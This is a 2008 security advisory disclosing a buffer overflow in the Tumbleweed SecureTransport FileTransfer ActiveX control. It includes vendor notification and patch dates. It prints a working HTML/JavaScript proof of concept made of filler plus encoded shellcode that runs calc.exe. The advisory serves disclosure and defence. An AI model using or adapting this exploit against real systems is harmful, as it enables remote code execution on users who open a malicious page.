|
aushack.com - Vulnerability Advisory
-----------------------------------------------
Release Date:
07-Apr-2008
Software:
Tumbleweed Communications - SecureTransport FileTransfer
http://www.tumbleweed.com/
Description:
"Tumbleweed SecureTransport is the industry's most secure Managed File Transfer
solution for moving financial transactions, critical business files, large
documents, XML, and EDI transactions over the Internet and private
IP networks.
The SecureTransport managed file transfer suite was built with
security in mind
from the ground up. SecureTransport provides corporate and
government organizations
with an enterprise-class managed file transfer service supporting a
broad and flexible
set of open Internet standards. Winner of the 2006 "Best Intellectual Property
Protection" award from SC Magazine, SecureTransport securely manages
file transfer
at over 20,000 sites around the world.
Financial networks use SecureTransport to move billions of dollars
in financial
transactions daily, and 8 of the top 10 U.S. banks use it to serve
tens of thousands
of corporate customers. Healthcare providers, payers, producers and
clearing houses
are linked through SecureTransport, which provides a single,
integrated secure file
transfer infrastructure for transferring private health information
(PHI). And
government agencies leverage SecureTransport to share sensitive documents
with other agencies."
Versions affected:
SecureTransport FileTransfer ActiveX Control vcst_eu.dll 1.0.0.5 English.
Prior versions, and other language editions (vcst_*.dll), are assumed
to be vulnerable.
Vulnerability discovered:
Buffer Overflow.
Vulnerability impact:
High - Remote code execution.
Vulnerability information:
This vulnerability allows remote attackers to execute arbitrary code
on vulnerable
installations of Tumbleweed Communications SecureTransport
FileTransfer ActiveX Control.
User interaction is required to exploit this vulnerability in that
the target must visit a
malicious page. It may be possible to embed into HTML capable email clients.
The specific flaw exists within the ActiveX control:
DLL: vcst_en.dll
CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3
interface IActiveXTransfer : IDispatch {
[id(0x00000007), helpstring("method TransferFile")]
HRESULT TransferFile(
[in] VARIANT URL,
[in] VARIANT hostName,
[in] VARIANT localFile,
[in] VARIANT remoteFile,
[in] VARIANT fdxCookie,
[in] long isSecure,
[in] long isUpload,
[in] int portNo,
[in] long isAscii,
[in] long shouldPerformMD5,
[in] long isCheckpointRestart,
[in] int serverPing,
[out, retval] VARIANT* errBuffer);
};
When a large value is specified for the 'remoteFile' parameter of the
IActiveXTransfer.FileTransfer() method, a stack overflow occurs.
Exploitation can result
in code execution under the context of the current user. Other
parameters, such as localFile,
fdxCookie and localFile may also vulnerable.
Examples:
The following HTML will execute calc.exe under Windows 2000 Professional.
<html>
<object classid="CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3"
id="Vulnerable"></object>
<script language="javascript">
Vulnerable.TransferFile("a", "b", "c",
"HqwToZjIhHkOZrLAyrUXkIEJkcQkiYRtePnECVUqpnlzkJTgBuGiqyLUCnceJkrsIxPXchpkjFj
IgJRqGvniwwHJssGiTaPpmKZlBPwGMYhShxUWMCLuhgrpWXfdoWCCRYtDTrwyvDmfdAtdazeizBqexoCG
ifFzEKzvLENkrNCoqpQVtclDmpzPIJZTgUuSHWyiZoUWeNzrJFILdoEpKoyEptrZidLYuGbCrHxrMURRp
dXyYJLzbeGRKqUOliWDHFdTEJOsGLngqOVVZdjzlCgOYbvSaUKcmQcugvmVQWMQVfudlFmPvrmULKPQDV
GuVFxuhFbuazTlsGbYhuJIjKfPdzGdYKcGVmVFqrtRrzXIGrauMEauSvNfDQkfyQNOTNSwftDyRhKdBFy
ZHaKQDDrxIEoFyrNLjLPTTGTYNlkoWfPdgSqStnopGaGkwCujLqtocvbYJuTVbUJUJbsloqLClPXTklqP
EOsthiraZgJzElMuXPuleJCQdcLsEbnalOGUpZsLgafPsjJEjUuIKAwjZWAaMLnVZwqMQeUYToFMBunec
lybwZcKUjHMZhUaEayTKAqPlXGIcUbJVXOpiergIyJVEegVBsPObCFGjXBCgEYZYWfUKxzvVzWeJvhqDR
ksWeZTWBRhMctQqFMuRHxuTifCqZUsVbILkcJNPUnbnsQHvxdmXMQdpHYTCiDBSwJUxmhKHRbYISvVGvb
urwysfdxiBPsDiHJJpBYnQpWdBQBwTrikbgybejtrQlBScWNsdHUxsaJpbKeamEbyjgABESztoNphFXKF
clPKGFfrDhBdQkPSxApusHVXwumGCVrfgNUDmOaGOAtHkoPzfDLAvtNaXPHWLaKCCUQAYdaAxALDrEcLZ
wGCXkOcgLVsSrJHAWMtpeAnplUkYhTizmWNyribnFjJAtCxHSJsjAAiPbMTsmAVCioiIdvUVzEWpVJDfH
QKGUAmmYqGUCfTXPyhkjcSyhBHOddRPvqWugerPbMMQlSllqNPquoytLBtvWbRyzAJddSxtzQaLATtYgi
bQzPeaMQzKIdpEJHPWSZyAkyaGkQJxCjgcrwQkBygMCsddYUdHifpbYdPgASxsPDjaTsArCJqosrCvrwH
DKkUKjSaoJtbTaiJreoGjDWfDafPjrStaCeUQCVwiyvafEIcsbSvlCavYTHKSnyraoIuUcsWPSpCVHbWE
YtwobKFQwvUjoCZqdZEFoQzvosazdPVjXhYqdnDpPTSRapMmAuFXsixOKucVKZZKOBSnAPEzsBcWMGBnN
RUVffkJSzESkzkgyKWHkQXIIVjWCeCqMXZtGtGRafPCRyQkZYjRpQOHisWHfdtOSyZHJapOYBLQpRMDyN
rhnmFeZWWaWpcuMkfEnZPBbLJwCQloArgGKvsudOoLNFfJwaWZzvSUGKFaddKnMIpuWwXtLzGKmkCJrDZ
kohkHrbmZZVhFGLhAgLMbwNVPixPcBefTvfNJimVtYGXYPgHChbZLSgPwSYzlqCIpzOMBVSjGzgksrmKj
AjlDRIhBBmELmUDMFSqHwWpxfEEWwjzObyFXZVGOMrrWqsWADbtweGtddyFNAIpqQqRzxmVUbjAbUxnDn
dqpKNDbWKpIHGAQuoGcufpEkjrbMecXBzSsKentBwSHkNDbPBkiZEvnQEKtFgIKCKDDBMsnxFLBKgyTYE
IkZdLjxBpuWUHRmrAqeLZGrSYcHlmhEsDbctsVoimbXEJryOLpibDVzoGaxfuhjyDvcNWhvSfixmuJUlN
WoeEJVpSVupoCcTCLteLmglsHXIWOUXEWZURFNjdmnaxJPAAPaKtbTQkqyjqbgLsEZtZUQTbqXCzkpnCe
KGbBvjiXJgnAbHGbowIAVKXRgcJXtkZLRuClxmJtSPfeIWyOUvaUGnXBQFJfbKwofltQJYldfKXbShFcf
wumMWSgIOmiTzGofVNEuGOnkFnnzjKLJVXwAkxonTCeINNwkIDgoVZmjfnflgvWUToyMkVSuGAQhzDLSo
eGtKuPHoPynBsdrVqPJcNksGiJmZWYsMZWoRIWsBTBwaSfOQlBjzmwqrGXdDBEeKSuwSncGcwJyOnlCpO
kXWcrBdfTncQfwLYfQPPWmlrLMPUZiOMcoxUmOSJbVzqbKlmgIjQcPABepTGFchsrdWijXbYxfLkIMxoT
DRjfkRiytIvzFAfWuXfHrEVXoAuVZEDPqiTemWciTsSmKbwEtfMXkIVpDxKlFxRJHdaMdUrEZCJNkATqM
nWcbAAEWPDNeWaPtGArUDpDPNkemRFZiEFLVqxaMdZnWFvFtUrXYWnPjWNMdTuzsMFxnmMEtwVQEcaZHz
IWvGfaNHKTgKroefyErvhZqAavhGLJFdIzbjnVXkJlfFEeWmfoTRFIYNtfIvIbjZNSsGMzjvZMYvfGwQD
zmDdCLHDEMdkYdCluEwIXBGugcOmrVhhTqhcJeWofypbnAvXsHNKwqDrWWWKYePeXkpInurLBiCAtqtVq
iYOIzPUzNZcmEUyOaIWetBzEUpovdlaSXRFtJSHkXsLKglMsqETAcHvJZWcGEeelObuqCdWaYqPhfghqG
fnYpErsUIVSZQbiRpJNdoeHLXEFeqXBoMpnZTaJZchqHpkdocMEvdOEnhOzzueuOTwXrwEATaDaWJpXZu
LsCrYczknwyAphmUevgvZzQGOQzyrsPvIZZUGXqSwgRADPhvcfBMAGYmPGDDXPnEoOzABADlDQGicETRI
AmcRwsSvszWELcaseVabXOmGuBhpfOjhALMypkyCgyBDpFEwbnGYSXFiNqbOqUypiJiTrOthTyspQvMQa
wnagaFJWzgoxKWQpoHXFxRUWRcmtLHFLPakRPDxNiGliWQqtRBjKHnBAagKkuMQLLVuDLevjbkEhqGFFY
ylybFEyMvdnMaRdcucYrpaSNGesjkOYWczjffbJmhEWTgeYGPDKRHBuOmauGzNNKCXhOAOqhxdHQAdfQE
ffPDBrvGiEodtTDIXeDdsOXcmMrdMJdxnbZFiuVRFNioshyrXTVodBxaFXYBbwfVwcUSJXGdZZAnYMEhV
tPEZYUUBeRJDZKFCrRuJQdLtkKakwFLEQXTcOUcjFPolJLWtJvXenczUxRbGZRINYXWUzzcHJNryYMOCH
NZsrfloSffZWtgLJXudLeRYwbukvxEMcMwXAYiXChqgVXDeXDMvfowmLZSwkHjTLtIRFnmGFArnVllqfj
iOnXPdZjaIxugozJjVcoVZnExzQxhxPrciIeSjJMBImjHfsHyoigqknpsAoNGpGqRSEVegZQXQlVQyNme
wfOjiZCwTWOdSRCwnzQczqnWyeXTIzzukwVKkDAsStGbrCwYYFQqnlBheQVFhGfgwKSCcQSqixNGSPeVo
bgJLiNftjLqycVBbSUphUqoxxstwQUdAVkQfyoKUAKWgEJycUHyHRPoVbnTTVHvrGnwzlPAvDsThykmjH
maWLblFsSPlHrsBJTvHWAmJViArtMgJZaTbPARfcnHAlorGubyovlnCfyQArosOILFrXKHupmHusRIoQg
DZzyZHsCZhNoOnHWnUsUGFeqYsLILkSwnvHsuOlYGjhIfMhwqmcaIMQaqFFkhABUEXzKyKYSQyOTyrFfq
IlIkNvLxriALuQsbamSphbypAADfqgXjxtFKzlXCuuCovaozBjtrqjyRqEJTLoLWXSJUzayhZYomKFzYB
fKYzGodrrIXemRZZRwDXyfCLVxmmdLOvwSCTjtsETodToQLvjrUkHUQktaQZvODJrtRgmEuFYDvPIcmyn
nHzAVroXUfFIvUszIyeJVaWogcLPDKuLTPmCWZEOWpyQeDUjhiyZHtjMEBnGYjYpnFeiAlaqfziytMiSA
UmXpKzJEdIPWNdMKsjilgDITudqqCoHrsQDGUBIbxtHCJRzPIQuthMmhiaJSvncBzVNuDDIJFXvySSKUO
lkFdEbbvvQYMRoFgGurkUAWbiczranFEsZzPYlUJKsAeFJOXPVmthxTdmgQWCzscNuhCNfRnOZFXwUOdG
mHGhBijSrytzjNJiwDyNNlYmQbrjSSPvDgOdEGZNbKEkhyoboqmlzQUvEhrSrEAuKduQGvOyrVgCvrhmz
XQjHsoQrkRMIgFNhqvMncLHcauYYPVcZNescGfqSPeFODxhzUkalkFRrMpnptBHYTZXVEgINvieNxFeJI
VYRJaEsJOwDEkXaUxvuHQgUSjyVxoXfxjzNTXehTukeQAosgTtbaTswUhSSxGmytLAxAUYmLpcNOWqvHW
giJhfduWtwALnUZoiGZIlKhbnHZmGLWjfgMDLbNJKNJAJufWHQDDdBNZsXXiFzgADlSniUqBjVQBNmCED
uciGDgnpNqXRGfdrPfMeFBsUHvwPYNfguoTgJoAUVCsfsXKXqbUOVaTbvWzaLFIiBodrzFvgzkejRwlBv
doDjvRUegEepepXqzHopUAAzvHgnacEwmXoZkmYmxKNJFoxekgijRWXRJteBBqwpPSrUVlSiHHPqBvipx
hCaLQlumwzvoFnQNHKzYnAFWcjqfsLzjjbIEBzRyMvTVSdQSoYhHzOUXgUERmDofuFOqzngpykPjhMpQE
lnoUzqwzHe
!UA* uTXYAUpo]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHQTEPC0C0LKG5GLLK
CLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJDMEQHBJKJTGKPTGTC4CEKUL
KQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP1L6E0F6E4LKQVFPLKG0DLLKBPELNMLK
CXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJGBCCQBLBCEPAA",
"d", false, false, 80, false, true, true, 420)
</script>
</html>
Additionally, a Metasploit Framework Module has been written to
demonstrate the vulnerability.
References:
aushack.com advisory
http://www.aushack.com/200708-tumbleweed.txt
Credit:
Patrick Webster ( patrick@aushack.com )
Disclosure timeline:
13-Aug-2007 - Discovered during quick audit.
14-Aug-2007 - Metasploit module developed.
22-Aug-2007 - Notified vendor.
19-Oct-2007 - Vendor patch released. SecureTransport Server 4.6.1 Hotfix 20.
07-Apr-2008 - Disclosure.
EOF
|
